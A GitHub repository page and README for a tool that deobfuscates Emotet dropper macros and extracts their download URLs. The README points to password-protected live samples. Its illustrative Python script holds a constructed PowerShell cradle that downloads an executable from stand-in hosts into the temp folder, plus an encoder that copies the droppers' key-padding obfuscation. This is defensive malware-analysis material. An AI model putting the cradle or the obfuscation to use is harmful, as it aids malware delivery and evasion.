https://github.com/jstrosch/emotet-droppers-fall2019
Python3 script that deobfuscates and then decodes a base64 string containing a PowerShell script, and extracts the URLs used to download Emotet binaries
- Host: GitHub
- URL: https://github.com/jstrosch/emotet-droppers-fall2019
- Owner: jstrosch
- Created: 2019-11-28T03:11:53.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2020-01-28T16:43:43.000Z (over 5 years ago)
- Last Synced: 2024-10-31T01:13:26.607Z (8 months ago)
- Language: Python
- Size: 20.4 MB
- Stars: 3
- Watchers: 3
- Forks: 2
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Deobfuscate Emotet Droppers - Fall 2019
Python2 script that deobfuscates and then decodes a base64 string containing a PowerShell script, and extracts the URLs used to download Emotet binaries.
The Word documents that appeared when Emotet resumed operations in the Fall of 2019 initially carried a plain base64-encoded string containing the PowerShell used to download the Emotet binary. Later, the base64 string was padded with a "key" that the macro stripped out at run time. The key initially followed a simple pattern but has become slightly more complex over time: the key is now also split by a copy of itself, so a single replacement leaves another copy of the key behind and multiple rounds of replacement are required before the string is valid base64.
Sample documents are contained in the _samples_ folder, the password for the zip is _infected_.
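The following is an added example, not the repository's own script, showing the deobfuscation flow the paragraph above describes: strip a "key" from a padded base64 string in repeated rounds (including the case where the key has been split by a copy of itself), decode the base64 as the UTF-16LE that PowerShell's `-EncodedCommand` expects, and pull out the download URLs. The PowerShell cradle, the key `#q!`, the `example.invalid`/`example.test` hostnames and the `pad_with_key` encoder are all constructed here for illustration; real droppers use different keys and layouts, and the encoder is only there so the sample runs offline.

```python
import base64
import re

# Valid base64 text: alphabet plus up to two '=' padding characters at the end.
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Download URLs stop at whitespace, quotes, or the separators droppers commonly use.
URL_RE = re.compile(r"https?://[^\s'\"@,;)]+", re.IGNORECASE)

# Constructed sample PowerShell download cradle (not a real Emotet payload).
SAMPLE_PS = (
    "$u='http://example.invalid/wp-content/a1/','http://example.test/img/b2/';"
    "foreach($x in $u){try{(New-Object Net.WebClient)"
    ".DownloadFile($x,$env:TEMP+'\\s.exe');break}catch{}}"
)
# Constructed key. It deliberately contains characters outside the base64
# alphabet so a stripped result can be validated by charset alone; with a
# purely alphanumeric key a false hit would corrupt the payload, which is
# why decode_powershell() re-checks the charset before decoding.
SAMPLE_KEY = "#q!"


def pad_with_key(b64: str, key: str, chunk: int = 12, split_key: bool = True) -> str:
    """Constructed encoder mimicking the padding described above (not the real
    dropper's VBA). Inserts a token between CHUNK-sized pieces of the base64
    text. With split_key=True the token is the key with another copy of the key
    spliced into its middle, so one replace() leaves a second copy behind."""
    mid = len(key) // 2
    token = key[:mid] + key + key[mid:] if split_key else key
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    return token.join(pieces)


def strip_key(padded: str, key: str, max_rounds: int = 16) -> tuple[str, int]:
    """Remove KEY repeatedly until the string stops changing.
    Returns (cleaned_string, number_of_rounds_needed)."""
    s, rounds = padded, 0
    while key in s and rounds < max_rounds:
        s = s.replace(key, "")
        rounds += 1
    return s, rounds


def decode_powershell(b64: str) -> str:
    """Base64-decode a stripped string. PowerShell -EncodedCommand payloads are
    UTF-16LE (every odd byte is NUL for ASCII text); fall back to UTF-8 when
    the bytes do not look like UTF-16."""
    if not B64_ALPHABET.match(b64):
        raise ValueError("non-base64 characters remain: key not fully stripped?")
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_urls(ps: str) -> list[str]:
    """Return the download URLs found in the decoded PowerShell."""
    return URL_RE.findall(ps)


def deobfuscate(padded: str, key: str) -> dict:
    """Full pipeline: strip key (multiple rounds), decode, extract URLs."""
    cleaned, rounds = strip_key(padded, key)
    ps = decode_powershell(cleaned)
    return {"rounds": rounds, "powershell": ps, "urls": extract_urls(ps)}


def build_sample() -> str:
    """Build the constructed padded sample the way a dropper would carry it."""
    b64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")
    return pad_with_key(b64, SAMPLE_KEY)


if __name__ == "__main__":
    padded = build_sample()
    print("padded:", padded[:60], "...")
    result = deobfuscate(padded, SAMPLE_KEY)
    print("rounds of key removal:", result["rounds"])
    for url in result["urls"]:
        print("url:", url)
```

The `rounds` count is the useful diagnostic: a sample that needs more than one round tells you the key has been split by itself, and a stripped string that still fails the base64 charset check tells you the key pattern has changed and the script needs updating, which is the "subject to change" point below.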
## Sample Output

## Subject to Change
As is likely no surprise, the padding/key will evolve over time, requiring updates to this script.